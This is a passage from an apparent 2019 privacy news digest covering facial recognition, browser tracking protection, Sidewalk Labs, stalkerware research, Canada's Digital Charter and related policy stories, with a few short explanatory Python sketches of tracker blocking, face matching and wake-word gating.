Stanford University computer scientists are warning about the consequences of a race to control what they believe will be the next key consumer technology market: virtual assistants. The group received a $3 million grant from the National Science Foundation to create a virtual assistant that allows users to avoid giving up personal information while maintaining some independence from technology companies. Computer systems designer Monica Lam says the group is concerned that virtual assistants such as Alexa and Siri, in their current designs, could have an even greater impact on personal data than today’s websites and apps. “A monopoly assistant platform has access to data in all our different accounts. They will have more knowledge than Amazon, Facebook and Google combined,” Lam said. [The New York Times]

WW – Firefox Now Blocks Tracking by Default

Mozilla Firefox now blocks website cookies that let advertisers and publishers track users around the web. The feature, called Enhanced Tracking Protection, blocks third-party cookies by default in newly installed versions of Firefox and will be rolled out to already installed versions in the coming months. It relies on a tracker block list compiled by partner Disconnect.me [list]. It is hard to say how exhaustive that list is, but it contains 2,567 domains, including a large number connected to Google. Mozilla has also added an upgraded version of the Facebook Container extension [see overview], which Firefox Senior Vice President Dave Camp says “makes it much harder for Facebook to build shadow profiles of non-Facebook users.” “People feel increasingly vulnerable,” Camp wrote in a blog post. “We believe that in order to truly protect people, we need to establish a new standard that puts people’s privacy first.” Apple’s Safari was the first to block third-party tracking cookies by default, followed by the web browser Brave; Google has announced similar controls for Chrome. [CNET | Naked Security (Sophos) | Firefox gets enhanced tracking protection, desktop password manager and more]
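
Mechanically, list-based protection like this comes down to two checks per request: is the request third-party relative to the page, and does its host fall under a blocklisted domain? A minimal Python sketch of that logic follows; the blocklist entries and the two-label domain shortcut are stand-ins, since real browsers consult the full Disconnect list and the Public Suffix List:

    from urllib.parse import urlparse

    BLOCKLIST = {"tracker.example", "ads.example"}   # stand-in for the Disconnect list

    def registrable(host):
        # Toy approximation: real browsers consult the Public Suffix List.
        return ".".join(host.split(".")[-2:])

    def should_block(page_url, request_url):
        page = registrable(urlparse(page_url).hostname)
        req = registrable(urlparse(request_url).hostname)
        is_third_party = page != req
        return is_third_party and req in BLOCKLIST

    print(should_block("https://news.site.example/story",
                       "https://tracker.example/pixel.gif"))   # True: blocked
    print(should_block("https://news.site.example/story",
                       "https://news.site.example/app.js"))    # False: first-party

In its standard setting, Firefox blocks the tracker's cookies rather than the whole request, which keeps pages working while severing the cross-site identifier.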

WW – Apple Unveils New Privacy Features at Annual Developers’ Conference

Apple Chief Executive Tim Cook unveiled new privacy features at Apple’s annual developers’ conference, telling attendees that the company was launching a feature called “Sign in With Apple” that lets users log in to third-party apps without having to enter a username and password. The announcement takes aim at Facebook Inc. and Alphabet Inc.’s Google, which have long offered developers the popular option of allowing customers to log in directly to third-party apps using their social-media accounts. That “can be convenient, but it can also come at the cost of your privacy,” Mr. Cook said, adding it can allow apps to collect data and track users. Apple said its sign-in technology would use facial-recognition software and would give users the ability to restrict which personal details they shared with apps, such as their e-mail address. Mr. Cook said Apple would also make it harder for apps to track the location of a user through their iPhone. This time last year, Mr. Cook announced a slew of new privacy controls, including an option for parents to remotely control how their children used their iPhones. Since then, nearly a dozen companies offering third-party parental-control software for the iPhone have complained that they were kicked off the App Store. Apple has said the third-party apps violated its privacy rules and wanted access to too much data about children’s phones. Those complaints have drawn the attention of global competition regulators and illustrate the fine line Apple must walk between respecting user privacy, promoting its own services and allowing competition in its app market. Reports emerged that the U.S. Justice Department would take charge of a potential antitrust probe into Apple’s control over app distribution, as part of a broader review, together with the Federal Trade Commission, of the anti-competitive practices of tech firms [read Reuters coverage]. [The Globe and Mail | Apple attacks Facebook by becoming the asocial network – TechCrunch | Apple Touts New Privacy Features Amid Scrutiny of Tech Giants | Alphabet, Apple, Amazon and Facebook are in the crosshairs of the FTC and DOJ | Antitrust Troubles Snowball for Tech Giants as Lawmakers Join In]

Security

WW – Hackers Installed Advanced Backdoor on Android Devices

Hackers were able to get an advanced backdoor preinstalled on Android devices before they left the factories in 2017. Google confirmed the Triada backdoor was installed on several Android models and initially had trouble detecting it, as it was “inconspicuously included in the system image as third-party code for additional features requested by the original equipment manufacturers.” Triada was able to access the Google Play app and download and install apps of its choice. The backdoor bypassed built-in security protections and could potentially modify the Android OS’ Zygote process. Google has worked with manufacturers to remove the backdoor from affected firmware. [Ars Technica]

Smart Cities and Cars

US – Study Documents the Surveillance of Self-Driving Cars

As self-driving cars develop further, autonomous vehicles will play a much larger role in the digital economy as car companies and others harness personalized customer information through geospatial and navigation technologies, combining it with existing financial consumer profiles, according to a recent study [Eyes on the Road: Surveillance Logics in the Autonomous Vehicle Economy – read abstract] by Luis F. Alvarez León, an assistant professor of geography at Dartmouth. He says: “Self-driving cars will represent a new mode for surveillance. Through a self-driving car’s global positioning system, navigational tools, and other data collection mechanisms, companies will be able to gain access to highly contextual data about passengers’ habits, routines, movements, and preferences. This trove of personal, locational, and financial data can be leveraged and monetized by companies, by providing a data-stream for companies to target customers through personalized advertising and marketing.” As the study points out, this may challenge notions of traditional car ownership, transforming “the car into a bundle of services rather than just a product.” Automobile manufacturers may essentially become digital platforms for media companies, search engines, retailers, vendors, and other companies aiming to offer services to passengers through a car’s infotainment system. As self-driving car technologies develop, privacy and security concerns loom as to how companies will use personal data, an area for which the limits and specific governance mechanisms have yet to be defined by federal regulations. [Office of Communications (Dartmouth College)]

CA – Advocates Concerned Digital Charter Not Enough for Sidewalk Labs Data

Privacy advocates have expressed concerns about whether Canada’s recently announced Digital Charter will do enough to protect citizens’ rights, particularly with the Sidewalk Toronto smart-city project. Former Information and Privacy Commissioner of Ontario Ann Cavoukian said the charter “is intended to provide comfort to citizens of Canada regarding privacy, but it’s talk.” Canadian Civil Liberties Association Privacy, Technology, and Surveillance Project Director Brenda McPhail added, “Giving people more control over their data is something the Digital Charter promised, and is a part of how we control our private information, but it’s not efficient as a privacy protection.” Sidewalk Labs Spokeswoman Keerthana Rang said the project was happy to see the Digital Charter include the creation of data trusts. [Reuters]

CA – Tech Investor Becomes Latest to Voice Concerns Over Sidewalk Labs

Silver Lake Partners Co-Founder Roger McNamee has become the latest person to voice concerns over the Sidewalk Labs smart-city project. The Facebook and Google investor urged the city to drop the project over the use of “algorithms to nudge human behavior.” “No matter what Google is offering, the value to Toronto cannot possibly approach the value your city is giving up,” McNamee wrote in a letter to the Toronto city council. “It is a dystopian vision that has no place in a democratic society.” [The Guardian]

CA – Sidewalk Labs’ Waterfront Project Under Fire From Industry Leaders

Two prominent industry leaders are speaking out against Sidewalk Labs’ Toronto waterfront project, which is meant to redevelop an area known as Quayside. Canadian architect Jack Diamond and renowned tech investor Roger McNamee wrote separate letters to Toronto City Council’s executive committee this week. In them, they urged the council to rethink the project. Their main concern was Sidewalk Labs’ collection and exploitation of personal data to create a smart city. [Toronto Storeys]

CA – Decision on Sidewalk Labs Toronto Project Put on Ice for Now

Waterfront Toronto’s board vote on whether to continue (or not) the establishment of a pioneering “smart city” has been pushed back several months, the organization administering the project announced. The delay of the decision surrounding the development of Sidewalk Labs’ controversial Quayside project will pave the way for a more comprehensive evaluation. Initially slated for September, the board vote on the Toronto development will now be conducted in December or even January 2020. [Mortgage Broker News]

Surveillance

CA – Stalking a Spouse Via Their Phone Should Be Treated As a Crime: Report

New research says Canada isn’t doing enough to crack down on stalkerware, a malicious form of technology that can be secretly planted on a person’s smartphone to track their every move. On June 12, the University of Toronto’s Citizen Lab published “The Predator in Your Pocket: A Multidisciplinary Assessment of the Stalkerware Application Industry” [read Executive Summary]. It raises alarm bells about apps typically advertised as a way for parents to monitor their children’s online activity or for employers to monitor staff. [Also see the companion report, “Installing Fear: A Canadian Legal and Policy Analysis of Using, Developing, and Selling Smartphone Spyware and Stalkerware Applications” – read Executive Summary – which, according to The Citizen Lab, conducts a detailed analysis of the criminal, regulatory, and civil law consequences of using, creating, selling, or facilitating the sale of stalkerware technology in Canada.] Researchers say these tools can be downloaded within minutes and used by abusive persons to spy on the smartphone activity of their partners and children. Depending on the technology, stalkerware can provide remote access to an individual’s text messages, their internet browsing history and even their current physical location. And while stalking a partner through their smartphone could break several laws, little is being done in terms of enforcement, according to study author Christopher Parsons, even though a host of civil and criminal charges, including privacy infringement and criminal harassment, could be laid against an abuser. The report looked at eight companies that offer the software and found that, in six cases, the technology is explicitly advertised as a way to target one’s spouse. Companies that offer stalkerware could also be held accountable, Parsons said, with regulators such as the CRTC stepping in. The report offers a number of recommendations to address the problem, including pushing the federal government to strengthen the Privacy Commissioner’s powers over companies. [CTV News | Legal gaps allow cellphone ‘stalkerware’ to thrive, researchers say]

US Government Programs

US – What Will the E-Verify Program Be Used to Surveil Next?

E-Verify is the federal government’s attempt to create an electronic national identification system [see here]. It is capable of checking government databases to verify information—often including a photo—on every U.S. resident. Right now, the system monitors only employment and is mandatory only in some states, ostensibly to deter illegal immigration, but nothing would prevent lawmakers from expanding E-Verify to monitor identity or legal status in any other domain and restrict access based on whatever other criteria they want. Ultimately, E-Verify doesn’t identify illegal immigrants very well at all. But the problem with E-Verify is more fundamental: it is the first step toward a permission-slip society. The more areas that E-Verify is used to monitor, the more it will create a digital record of Americans’ lives—a record that lawmakers can draw upon to add further requirements for access to jobs, health care, banks, gun sales, housing, and much else. Once E-Verify becomes fully mandatory for employment nationwide, proponents will seek to use it to enforce other laws. In 2015, the GOP-controlled House Judiciary Committee even voted down an amendment to a mandatory E-Verify bill that would have banned using E-Verify for purposes other than employment. This is a harbinger that the E-Verify system, if mandated federally, could be used to monitor much more than just Americans’ employment choices. Congress would need only make a few tweaks to the system to make it serviceable for other goals beyond jobs. This blog post provides examples and explanations of a few likely targets: 1) Gun sales; 2) Transportation; 3) Driver’s licenses; 4) Bank accounts; 5) Apartment rentals; and 6) Access to certain buildings. Creating infrastructure that is capable of not only monitoring but instantly restricting access to all manner of private activities will hand the government power to control the lives of Americans in ways otherwise unimaginable. Once E-Verify use becomes ubiquitous, the federal government (and perhaps state and local governments as well) would have the power to shut down people’s lives overnight for almost any reason. A flip of a switch could stop their access to jobs, housing, bank accounts, driver’s licenses, and transportation. No free society should stand for such control. [CATO at Liberty blog | E-Verify Errors Harmed 760,000 Legal Workers Since 2006]

US – FBI Has Access to About 640M Photographs: Watchdog

Gretta Goodwin of the Government Accountability Office [GAO] told lawmakers at a House oversight committee hearing June 4 [details & watch] that the FBI has access to about 640 million photographs — including from driver’s licenses, passports and mugshots — that can be searched using facial recognition technology [read her prepared testimony, fast facts, highlights]. The figure reflects how the technology is becoming an increasingly powerful law enforcement tool, but it is also stirring fears about the potential for authorities to intrude on the lives of Americans. The FBI maintains a database of mugshots known as the Interstate Photo System that can help federal, state and local law enforcement officials. It contains about 36 million photographs [privacy impact assessment]. But taking into account the bureau’s contracts providing access to driver’s licenses in 21 states, and its use of photos and other databases, the FBI has access to about 640 million photographs, Goodwin said. Kimberly Del Greco [read prepared statement], a deputy assistant director at the FBI, said the bureau has strict policies for using facial recognition. She said it is used only when there is an active FBI investigation or an assessment, which can precede a formal investigation. When using the state databases, the FBI submits a so-called “probe photo,” and the states then conduct a search to yield a list of potential candidates to be reviewed by trained federal agents. Civil liberties advocates asked lawmakers this week to implement a temporary federal moratorium on facial recognition technology. “Lawmakers must put the brakes on law enforcement use of this technology until Congress decides what, if any, use cases are permissible,” said Neema Singh Guliani, senior legislative counsel with the American Civil Liberties Union. [The Associated Press]
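
The "probe photo" workflow described here is, at its core, a nearest-neighbor search over face templates with a confidence cutoff. The Python sketch below (using NumPy, with random vectors standing in for enrolled photos; an illustration of the mechanism, not the FBI's system) shows why the threshold setting determines how many candidates reviewers see:

    import numpy as np

    rng = np.random.default_rng(0)
    gallery = rng.normal(size=(10_000, 128))          # stand-in for enrolled photos
    gallery /= np.linalg.norm(gallery, axis=1, keepdims=True)

    def search(probe, threshold=0.9, top_k=10):
        """Return gallery candidates whose cosine similarity clears the threshold."""
        probe = probe / np.linalg.norm(probe)
        sims = gallery @ probe                        # cosine similarity per photo
        order = np.argsort(sims)[::-1][:top_k]
        # A lower threshold returns more candidates, and more false matches,
        # which is why reviewers see a ranked list rather than a single "hit."
        return [(int(i), float(sims[i])) for i in order if sims[i] >= threshold]

    probe = rng.normal(size=128)
    print(search(probe, threshold=0.2))               # loose cutoff: several candidates
    print(search(probe, threshold=0.9))               # strict cutoff: likely none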

US Legislation

US – Senate Talks on US Data Privacy Law Grind To a Halt

Talks to create the US’s first national data privacy law have ground to a halt, according to those close to the process, as senators argue over how strict the bill should be. People briefed on the talks have told the Financial Times that the handful of senators drafting what could become the US version of the EU’s General Data Protection Regulation are struggling to agree on key terms of the bill. The technology industry is keen for a bill to be passed before the end of the year, when a separate data privacy act comes into force in California [the California Consumer Privacy Act (CCPA)]. Companies have warned that it will be difficult to comply with some of the stronger elements of the California act, and had been hoping Congress would pass a bill to override it before it takes effect on January 1. But following months of talks among members of the Senate Commerce Committee, the draft bill is yet to be published. Those close to the process had hoped to release it several months ago, but say the negotiations between Republicans and Democrats have now all but stalled. One Democrat adviser said: “If the industry simply wants a bill that is going to water down California, they haven’t got a hope. There is no way the Democrats will agree to anything like that. Talks are at a standstill now. I wouldn’t be surprised if we don’t manage to come up with a draft at all.” In the absence of a federal law, the industry faces the spectre of tough provisions in California becoming a de facto national standard, so tech companies have also been pushing hard for progress on Capitol Hill. However, according to those briefed on the talks, they have hit an impasse in particular over whether individual citizens should have the right to sue companies, the so-called private right of action [coverage], for data breaches. [Financial Times]

 

+++

 

16-31 May 2019

Biometrics

CA – Privacy Advocates Sound Warning on Toronto Police Use of Facial Recognition Technology

For more than a year, Toronto Police have been using facial recognition technology without widespread public knowledge. Deputy Chief James Ramer tried to demystify its use at a Toronto Police Services Board meeting, where police presented their report on the facial recognition pilot project they ran from March 22, 2018 to Dec. 31, 2018. They spent $451,718 to purchase the system in March 2018, using funding from a provincial Policing Effectiveness and Modernization Grant. Police say the pilot project has been effective in helping investigators solve crimes, and while it could be an effective crime-fighting tool, privacy advocates are concerned the risks to civil liberties outweigh the benefits. Michael Bryant of the Canadian Civil Liberties Association said “Nobody knew about it. Nobody knew it was being used and how it was being used,” and called for an immediate moratorium on the use of facial recognition technology until standards, checks and balances can be developed and debated by city council. “Facial recognition technology as it is being used today is carding by algorithm and by a notoriously unreliable algorithm at that,” said Bryant. Ann Cavoukian, the former three-time Information and Privacy Commissioner of Ontario, says the lack of debate about the rollout of this technology is a big concern: “There is no transparency associated with this. And you can’t hold people accountable if you don’t know what’s going on. So this has been taking place for a year. And while people may not be aware of it, there’s a very high false-positive rate for facial recognition.” She says there is concern the technology’s use in public spaces presents a threat to individual privacy and could be abused. But Deputy Chief Ramer says Toronto police have no intention of using the system to randomly scan faces in public places. Still, Cavoukian is concerned that no guidelines or oversight have been put in place: “Have independent oversight and you know it can’t just be sprung on us a year after the fact.” [CBC News]
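
Cavoukian's point about false positives compounds with base rates: when genuine matches are rare, even a small false-positive rate means most alerts are wrong. A back-of-envelope Python illustration, with assumed numbers rather than Toronto's actual figures:

    scans = 100_000        # faces checked against a watchlist (assumed)
    true_matches = 10      # persons of interest actually present (assumed)
    fpr = 0.01             # assumed false-positive rate: 1% of innocents flagged
    tpr = 0.95             # assumed true-positive rate

    false_alarms = (scans - true_matches) * fpr       # ~1,000 innocent people flagged
    correct_hits = true_matches * tpr                 # ~9.5 real matches
    precision = correct_hits / (correct_hits + false_alarms)
    print(f"Share of alerts pointing at the right person: {precision:.1%}")   # ~0.9%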

US – Legal Challenges of Collecting Biometric Data

Forrester Research discusses the growing legal and regulatory implications of biometric data collection. The use of biometric technology has exploded over the last few years, and while it offers convenience for users, it also raises concerns on how the data is collected, stored and used. In addition to the already established Illinois Biometric Information Privacy Act, several other states, including Massachusetts, New York and Michigan, have draft bills in development. Meanwhile, just days after it was reported that genealogy company GEDmatch tweaked its rules to allow Utah police to search for a suspect in a violent assault case, the company updated its terms of service so that users must now opt in to allow their DNA profiles to be used in law enforcement searches, according to BuzzFeed News. [ZDNet]

US – House to Hold Hearing on Facial Recognition

The U.S. House Committee on Oversight and Reform has scheduled part one of the “Facial Recognition Technology” hearing. The first session will discuss the impacts of facial-recognition tech on citizens’ civil rights and liberties. The hearing is timely given the recent ban of facial recognition in San Francisco and other facial-recognition issues sprouting up around the country. The Verge reports the New York Police Department has several issues with the abuse of its facial-recognition tech, including image revision and using images of non-suspects. Chicago and Detroit are among U.S. cities that are buying into real-time facial recognition for various uses, according to a report from Wired. Facial-recognition tech producers in China expect to benefit most from the rise in consumer demand as CNBC reports the country plans to be the world leader in artificial intelligence by 2030 and spend $9.6 billion on facial recognition by 2022. [House.gov]

US – Defendants File for Dismissals in Illinois Case of Employee Biometric Scans

Northwestern Memorial Hospital and a pair of medical vendors are calling for the U.S. District Court for the Northern District of Illinois to dismiss a putative class action against them regarding possible unlawful biometric scanning of employees. Two workers at two hospitals in Northwestern’s system are claiming Northwestern violated the Illinois Biometric Information Privacy Act by not disclosing or obtaining consent for the sharing of fingerprint scans with Omnicell and Becton Dickinson, which provide the biometric software Northwestern employees use to access medication storage. Omnicell and Becton Dickinson were included in the suit for not notifying the plaintiffs how long their data would be stored or for what reason. The defendants argue the case should be thrown out because the biometric law does not extend to the health care field. [Cook County Record]

US – Mich. Introduces Bill Prohibiting Facial-Recognition Use by Police

Michigan’s State Senate has proposed a bill that would ban police from using facial-recognition technology. Republican State Sen. Peter Lucido introduced Senate Bill 342, which outlaws all actions involving facial-recognition tech and the use of information gathered from the technology. The bill aims to protect the privacy of citizens, but it will also hinder efforts to create a federal surveillance system. While Michigan seeks to put facial recognition to rest, The Hill reports that a New York school district is the first in the U.S. to deploy facial recognition in schools. Lockport City School District will begin testing the Aegis system, which will be used to identify weapons and other school threats. [The Libertarian Institute]

US – Amazon Shareholders Vote to Not Limit Sale of Facial-Recognition Software

Amazon’s shareholders voted to not limit the sale of its Rekognition software to governments and government agencies. Opponents wanted to limit the sale of the technology, citing concerns about the impact it could have on civil and human rights, and pushed for stronger oversight as to who could use the software and how it could be used. Meanwhile, The Hill reports that Sen. Christopher Coons, D-Del., is taking another look at Amazon Alexa’s privacy and data security practices. Coons has asked CEO Jeff Bezos to clarify the type of personal information Amazon retains and how much control customers have over deleting data. [Gizmodo]

Big Data / Data Analytics / Artificial Intelligence

WW – 42 Countries Sign Off on OECD’s New Principles on Artificial Intelligence

The Organisation for Economic Co-operation and Development has released its Principles on Artificial Intelligence, a set of intergovernmental guidelines that has been recognized by 42 countries. The OECD designed the principles to “uphold international standards that aim to ensure AI systems are designed to be robust, safe, fair and trustworthy.” Backed by the European Commission, the OECD produced five principles for proper deployment of AI and five recommendations for both public and international policy. “Artificial Intelligence is revolutionising the way we live and work, and offering extraordinary benefits for our societies and economies. Yet, it raises new challenges and is also fuelling anxieties and ethical concerns,” OECD Secretary-General Angel Gurría said. “These Principles will be a global reference point for trustworthy AI so that we can harness its opportunities in a way that delivers the best outcomes for all.” [OECD.org]

Canada

CA – Canada Announces Digital Charter, Seeks to Reform Privacy Rules

During an address to the Empire Club of Canada, the Honourable Navdeep Bains, Minister of Innovation, Science and Economic Development, launched Canada’s new Digital Charter [watch Bains’s intro video, read overview of 10 principles of the Charter here, also read Bains’s message & overview]. Minister Bains also announced an initial set of actions that will serve to implement the Charter’s principles, highlighted by proposals to modernize the Personal Information Protection and Electronic Documents Act (PIPEDA), which governs the use of data and personal information by private entities. Additional actions will be announced in the coming days. [read: Proposals to modernize the Personal Information Protection and Electronic Documents Act] With Canada’s Digital Charter, the Government aims to lay the foundation for modernizing the rules that govern the digital sphere in Canada and rebuilding Canadians’ trust in these institutions. The Charter outlines what Canadians can expect from the Government in relation to the digital landscape. The 10 principles set out in the Charter aim to provide the framework for continued Canadian leadership in the digital and data-driven economy. Those principles are: 1) Universal Access; 2) Safety and Security; 3) Control and Consent; 4) Transparency, Portability and Interoperability; 5) Open and Modern Digital Government; 6) A Level Playing Field; 7) Data and Digital for Good; 8) Strong Democracy; 9) Free from Hate and Violent Extremism; and 10) Strong Enforcement and Real Accountability. The Digital Charter is a government-wide approach that will ensure Canadians can trust new digital technologies and that their data and privacy will be safe. It will ensure that our democratic institutions will be protected, and that Canadians will be able to take full advantage of the many new opportunities unlocked by data-driven technologies. [Innovation, Science and Economic Development Canada | Canada’s National Observer | Canada announces Digital Charter, promises serious fines to business for not protecting privacy | Canada’s digital charter represents a sea change in privacy law, but several unaddressed issues remain | Trudeau government unveils plans for digital overhaul | Ottawa launches data strategy, eyes fines tied to tech giants’ revenue | Five reasons Canada’s Digital Charter will be a bust before it even gets going | FUREY FACTOR Downloading Trudeau’s digital charter – is it too vague? (video) | KINSELLA: Trudeau needs to practice what he preaches | Give Canadians privacy rights in new law, says federal privacy commissioner | Canada’s Digital Charter: How to give it teeth | Minister Bains announces Canada’s Digital Charter]

CA – SCC Decision: ‘With Extensive Powers Come Great Responsibilities’

On May 31, in a 3-2 ruling, the Supreme Court of Canada set aside the gun- and drug-related convictions of Tom Le, an Asian-Canadian man who was arrested by police at a west Toronto housing complex in May 2012, saying police had no reasonable cause to walk into a backyard and begin questioning him [see “Tom Le v. Her Majesty the Queen” – docket & summary – watch the October 12, 2018 SCC hearing]. Le was chatting with four young black men in a backyard one night when police officers showed up. The officers had been told by security guards who patrolled the housing co-operative that this was a “problem address” over concerns about drug trafficking in the rear yard. Two officers entered the yard without consent or a warrant, and began asking questions and requesting identification. A third officer patrolled the property’s perimeter, then stepped over a low fence and told one man to keep his hands where he could see them. An officer questioned Le, demanded ID and asked about the contents of a satchel he was carrying. Le fled but was soon tackled and apprehended a short distance away, with the bag containing a loaded handgun, cocaine and a considerable amount of cash. In its decision, the high court says the actions of police that night amounted to arbitrary detention, a serious violation of Le’s charter rights. It says the reputation of a community — or the frequency of police contact with its residents — does not in any way license police to enter a private home more readily or intrusively than they would in a community with higher fences or lower rates of crime. “Requiring the police to comply with the charter in all neighbourhoods and to respect the rights of all people upholds the rule of law, promotes public confidence in the police and provides safer communities,” the decision says. “The police will not be demoralized by this decision: they, better than anyone, understand that with extensive powers come great responsibilities.” [CBC News | Supreme Court blasts arrest of racialized man, overturns his gun and drug convictions]

CA – Ontario Takes Action to Protect Privacy and Personal Data

On May 30, at the Open Government Partnership Global Summit, Bill Walker, Minister of Government and Consumer Services, highlighted the results from the Government’s online survey for its Data Strategy. They include: 1) 83% of respondents feel businesses don’t do a good enough job of explaining what they plan to do with the public’s data, and 2) 79% of respondents believe data about people and businesses in Ontario needs stronger protection. Ontario’s Data Strategy will prioritize three areas:

  1. Promoting Public Trust and Confidence: In the face of growing risks, ensure public trust and confidence in the data economy by introducing world-leading, best-in-class privacy protections;
  2. Creating Economic Benefits: Enabling Ontario firms to develop data-driven business models and unlock the commercial value of data; and
  3. Enabling Better, Smarter, Efficient Government: Unlocking the value of government data by promoting use of data-driven technologies.

Minister Walker also announced the government’s first step in creating a policy framework to guide the development of smart cities in Ontario. The new smart cities principles will help Ontarians and businesses benefit directly from the data economy, while ensuring their personal privacy is protected to the highest standard. The Province’s five framework principles require smart cities and the companies that create them to:

  • Guarantee that Ontarians’ privacy and personal data are protected, managed responsibly, and kept secure;
  • Put people first by ensuring that Ontarians are the primary beneficiaries and valued partners in the opportunities created by the project;
  • Create responsible and good governance systems that are democratic, accountable, and transparent;
  • Enact leading, best technical practices that ensure chosen technologies use open software and open standards, and are secure, interoperable, locally procured, flexible, durable, and scalable; and
  • Educate the public on the risks associated with the project and provide meaningful opportunities for local residents to participate and engage in the creation of the smart city. [Ontario.ca]

CA – OPC Suspends Consultation on Transborder Data Flows

As reported by Bloomberg Law, on May 24, 2019, the Office of the Privacy Commissioner of Canada (OPC), under Commissioner Daniel Therrien, suspended its public consultation on transborder data flows [read OPC overview], which it had launched on April 9, 2019. The suspension follows the announcement of the Digital Charter by the Canadian government, which puts forward principles for digital reform, including improvements to Canadian privacy law [see gov’t overview]. Since 2009, transborder data flows outside of Canada have relied on the accountability principle, based on guidance from the OPC [see here]; Therrien wishes to abandon that guidance, hence the consultation. He suspended the consultation given that a reformed privacy law might address approaches to transborder data flows outside of Canada. While the consultation is suspended, it has not necessarily concluded and may resume in the future, according to remarks he made this week [news coverage]. The Centre for Information Policy Leadership at Hunton Andrews Kurth LLP (CIPL) had already responded to the OPC’s consultation before its suspension [read 9 pg PDF]; CIPL recommended against the proposed changes to the OPC’s 2009 guidance. [Privacy & Information Security Law Blog (Hunton Andrews Kurth)]

CA – Amazon Faces Tough Questions on Parliament Hill Over Privacy Practices, Ad Targeting

Tech giant Amazon was in the hot seat in the House of Commons during the third and final day [read PR] of the International Grand Committee on Big Data, Privacy and Democracy [hosted by Canada’s Standing Committee on Access to Information, Privacy and Ethics (ETHI) – see PR, agenda & how to watch meetings 151–155] over how its ‘smart speakers’ target ads at users and occasionally record household conversations. Mark Ryland, director of security engineering for Amazon Web Services, tried to reassure the committee that its smart speaker devices only activate in response to so-called ‘wake up’ words. He was quickly contradicted by Alan Davidson, vice-president of global policy, trust and security for Mozilla, which developed the Firefox browser, who told MPs he was shocked to discover that the Amazon Echo device in his home had recorded his children [and stored those recordings for years in the cloud]. Amazon also faced tough questions about the way it can use searches on its Alexa or Echo smart speakers to target users with ads associated with their searches. Ryland said information gathered by Alexa or Echo devices is added to the user’s profile along with other information, such as lists of items they’ve bought on Amazon. He said users are aware that their information is being used by the company and they can check the information gathered about themselves on Amazon’s website. While some of the companies that have appeared before the committee have said they’re willing to accept new laws governing their behaviour — and would like to see the European Union’s tough new privacy law, the GDPR, extended to other countries — Ryland said existing competition laws are sufficient and the GDPR is good in principle but cumbersome. Ryland said Amazon respects domestic laws in the countries where it operates. The committee also heard from Apple and Microsoft, which outlined the steps they have been taking to protect the data of their users. [CBC News | Terence Corcoran: Politicians try bullying Big Tech into doing their censorship dirty work | Politicians’ anger at big tech on full display at International Grand Committee meeting in Ottawa | Enhanced privacy should be the default for Canadians, MPs argue at international committee]
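
The dispute turns on how wake-word gating works: a rolling audio buffer is screened on-device, and audio is retained or sent onward only once a local keyword detector fires, which is why accidental activations still produce stored recordings. A simplified Python sketch of the gating logic follows; it is hypothetical, not Amazon's code, and a trivial byte match stands in for the keyword-spotting model:

    from collections import deque

    BUFFER_FRAMES = 50   # roughly a second of audio, say

    def detects_wake_word(frames):
        # Stand-in for an on-device keyword-spotting model.
        return b"alexa" in b"".join(frames)

    def run(mic_frames):
        buffer = deque(maxlen=BUFFER_FRAMES)   # audio that never leaves the device
        uploaded = []                          # audio that does leave the device
        streaming = False
        for frame in mic_frames:
            buffer.append(frame)
            if not streaming and detects_wake_word(buffer):
                streaming = True
                uploaded.extend(buffer)        # buffered context is sent too
            elif streaming:
                uploaded.append(frame)         # everything after the trigger is sent
        return uploaded

    # A mis-detection ("alexander" contains "alexa") uploads audio just as a real wake would:
    print(run([b"talking", b"about", b"alexander", b"the", b"great"]))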

CA – Feds Propose New Rules for Voice, Video Recorders in Locomotives

The federal Liberals have laid out their proposal for rules around voice and data recorders on locomotives, specifying when companies can use the devices to address safety concerns and how workers’ privacy will be protected. Legislation passed by Parliament required the government to come up with regulations for the recorders, which are similar to “black boxes” on airplanes [Bill C-49 & text, the Transportation Modernization Act; in May 2018, the Railway Safety Act (RSA) was amended to mandate the installation of locomotive voice and video recorders in the locomotive cabs of Canada’s federally regulated railways — also see history of TSB actions on the issue]. Transport Canada [here & here] wants to limit companies’ uses of the recorders’ data to instances where there is reason to believe that crew activities led to a collision, derailment or similar incident, and only to a small window of time. The rules are subject to a 60-day consultation period, after which the federal cabinet would have to enact the regulations, which likely won’t occur until after this fall’s election. The 18 rail companies subject to the new rules would then have two years to have recorders installed — a process that is estimated to cost $76 million, according to a federal analysis. The proposed regulations say that rail companies will have to respect requirements under the federal private-sector privacy law, including rules on how the information must be handled and who can access it, and strict limits on its use to situations like federal investigations. When legislators debated the proposal two years ago, Unifor [PR], Teamsters Canada [PR] and the federal privacy commissioner [letter] all raised concerns that the recording devices could be used for discipline that has nothing to do with a rail incident. [City News Montreal]

CA – Québec Commission d’accès à l’information Releases Guidance on Video Surveillance

In February 2019, the Québec Commission d’accès à l’information (CAI), the Québec government agency responsible for access to information and privacy matters in both the public and private sectors, released an updated guide on video surveillance titled La Vidéosurveillance: Conseils pratiques à l’intention des organismes publics et des entreprises (the “Guide”) [4 pg PDF in French]. The CAI has already made several decisions on the use of video surveillance this year. The Guide’s recommendations are significant for any business or organization that uses or is contemplating the use of any camera technology that captures personal images. Further, the privacy considerations in the Guide are not limited to surveillance cameras, as they also extend to drones and any other devices with image-capture capabilities. The Guide places a strong emphasis on the need to evaluate and justify the use of video surveillance technology. Organizations should conduct the following three-step analysis:

  1. What is the objective achieved through a video surveillance system?;
  2. Is this objective legitimate, important, urgent and real?; and
  3. If so, is the invasion of privacy that results from the image-capture a proportional means of achieving this objective?

The business or organisation must also ensure that the way video surveillance is used is in line with its privacy obligations. The Guide provides nine key recommendations:

  • Adopt a video surveillance policy and designate a person who will be responsible for the use of video surveillance technology;
  • Inform the public or those targeted of the presence of cameras;
  • Limit the scope of video surveillance;
  • Ensure that the images collected are secured;
  • Limit the access and use of the images collected to those that are required to achieve the stated objective;
  • Destroy the images in a secure manner once they are no longer needed to achieve the stated objective;
  • Anticipate providing access to those targeted by the surveillance;
  • For public organizations subject to the Règlement sur la diffusion, consult the relevant access to information and privacy committee; and
  • Periodically re-evaluate the policy and the use of video surveillance. [snIP/ITs (McCarthy Tétrault)]

CA – Scrap Community Safety Act, Civil Society Groups Urge Victoria

